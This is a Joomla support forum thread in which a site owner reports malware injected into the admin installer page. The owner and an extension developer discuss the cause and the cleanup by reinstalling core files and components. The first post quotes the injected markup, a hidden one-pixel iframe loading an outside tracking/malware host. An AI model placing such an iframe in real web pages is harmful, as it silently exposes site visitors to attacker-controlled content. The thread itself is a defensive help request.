on loading http://uniqueindiatour.com/administrato ... _installer I get the chrome message of this malware.
On the front end it is not visible.
I have changed the ftp password.
This is since yesterday. I had installed Ninja RSS component, which later I found after this event that Joomla advises against using it.
I have removed Ninja Rss but the problem persists.
I checked my site on http://www.unmaskparasites.com/ which says nothing is wrong. But it can check the frontend only.
When I do view-source:http://uniqueindiatour.com/administrato ... _installer in the code i find this:
<input type="hidden" name="9ba575d9c85a065355e4c05c0a564be3" value="1" /></form><iframe src="http://internetcountercheck.com/?click=13177296" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
<div class="clr"></div>
It is only when I want to install something that this maliciousness is visible.
I checked the php code of com_installer but could not find any reference to it.
Will I be able to remove it easily?
I have in the meantime advised my hosting provider to do a virus scan as well.
Thanks in advance.
virus / php injection internetcountercheck.com in backend!
Moderator: General Support Moderators
Forum rules
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting.
Forum Post Assistant - If you are serious about wanting help, you should use this tool to help you post.
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting.
Forum Post Assistant - If you are serious about wanting help, you should use this tool to help you post.
-
- Joomla! Apprentice
- Posts: 17
- Joined: Mon Apr 27, 2009 6:21 pm
- Location: New Delhi, India
- Contact:
virus / php injection internetcountercheck.com in backend!
This too shall pass.
Basho: "Sitting silently doing nothing, the spring comes on its own, the [* spam *] grows by itself."
Basho: "Sitting silently doing nothing, the spring comes on its own, the [* spam *] grows by itself."
-
- Joomla! Apprentice
- Posts: 17
- Joined: Mon Apr 27, 2009 6:21 pm
- Location: New Delhi, India
- Contact:
Re: virus / php injection internetcountercheck.com in backen
I have solved this. The help was from here http://www.msamir.net/joomla-and-wordpress-virus/
Basically downloaded full package of joomla 1.5.18, unzipped it on my machine, uploaded all the files to the webserver. After this, it gave me the message I need to delete the installation folder, which I did.
After this, in the first tests, all izz well
Hope I do not have to post again.
Basically downloaded full package of joomla 1.5.18, unzipped it on my machine, uploaded all the files to the webserver. After this, it gave me the message I need to delete the installation folder, which I did.
After this, in the first tests, all izz well
Hope I do not have to post again.
This too shall pass.
Basho: "Sitting silently doing nothing, the spring comes on its own, the [* spam *] grows by itself."
Basho: "Sitting silently doing nothing, the spring comes on its own, the [* spam *] grows by itself."
-
- Joomla! Apprentice
- Posts: 17
- Joined: Mon Apr 27, 2009 6:21 pm
- Location: New Delhi, India
- Contact:
Re: virus / php injection internetcountercheck.com in backen
Spoke to soon!
Few components were infected as well. Had to uninstall them and re-install. Seems to work for the moment.
Few components were infected as well. Had to uninstall them and re-install. Seems to work for the moment.
This too shall pass.
Basho: "Sitting silently doing nothing, the spring comes on its own, the [* spam *] grows by itself."
Basho: "Sitting silently doing nothing, the spring comes on its own, the [* spam *] grows by itself."
- Danayel
- Joomla! Enthusiast
- Posts: 236
- Joined: Sun Feb 11, 2007 4:59 am
- Location: Nagoya, Japan
- Contact:
Re: virus / php injection internetcountercheck.com in backen
Hi delhidjinn,
How do you know it was Ninja RSS that cause it and not just a coincidence of timing?
This virus can only be planted with FTP access to your site which Ninja RSS doesn't have, enable or give.
It also seems odd that it happened the same day you installed Ninja RSS, but we haven't had any other reports of sites being infected with this virus via Ninja RSS.
Can you be certain it was Ninja RSS?
p.s. what do you mean Joomla advises against Ninja RSS?
How do you know it was Ninja RSS that cause it and not just a coincidence of timing?
This virus can only be planted with FTP access to your site which Ninja RSS doesn't have, enable or give.
It also seems odd that it happened the same day you installed Ninja RSS, but we haven't had any other reports of sites being infected with this virus via Ninja RSS.
Can you be certain it was Ninja RSS?
p.s. what do you mean Joomla advises against Ninja RSS?
NinjaForge - More than 60 Professional, Open Source, Web 2.0 Extensions
http://ninjaforge.com - Get on the cutting edge.
http://ninjaforge.com - Get on the cutting edge.
-
- Joomla! Apprentice
- Posts: 17
- Joined: Mon Apr 27, 2009 6:21 pm
- Location: New Delhi, India
- Contact:
Re: virus / php injection internetcountercheck.com in backen
Now that we are discussing this:
It could be coincidence because just a day before I gave ftp access to my seo company, maybe it happened then.
I was certain of ninja rss because that was the only component I had installed in those days. But I gave ftp access as well, which I had immediately discontinued on discovering this injection and uninstalled ninja rss. Also, as the component figures on the Joomla's caution list, it was a case of 2 +2 - that's all.
Joomla advises against ninja rss: it was due to the list of components with known vulnerabilities which is the Joomla caution list.
It could be coincidence because just a day before I gave ftp access to my seo company, maybe it happened then.
I was certain of ninja rss because that was the only component I had installed in those days. But I gave ftp access as well, which I had immediately discontinued on discovering this injection and uninstalled ninja rss. Also, as the component figures on the Joomla's caution list, it was a case of 2 +2 - that's all.
Joomla advises against ninja rss: it was due to the list of components with known vulnerabilities which is the Joomla caution list.
This too shall pass.
Basho: "Sitting silently doing nothing, the spring comes on its own, the [* spam *] grows by itself."
Basho: "Sitting silently doing nothing, the spring comes on its own, the [* spam *] grows by itself."
- Danayel
- Joomla! Enthusiast
- Posts: 236
- Joined: Sun Feb 11, 2007 4:59 am
- Location: Nagoya, Japan
- Contact:
Re: virus / php injection internetcountercheck.com in backen
It should have been taken off the list as we removed the vulnerability 15 minutes after it was announced and we emailed them. It was some code left over from the previous developer which we hadn't noticed.
I will email them again. Thanks for letting me know.
Which SEO company do you use by the way?
I will email them again. Thanks for letting me know.
Which SEO company do you use by the way?
NinjaForge - More than 60 Professional, Open Source, Web 2.0 Extensions
http://ninjaforge.com - Get on the cutting edge.
http://ninjaforge.com - Get on the cutting edge.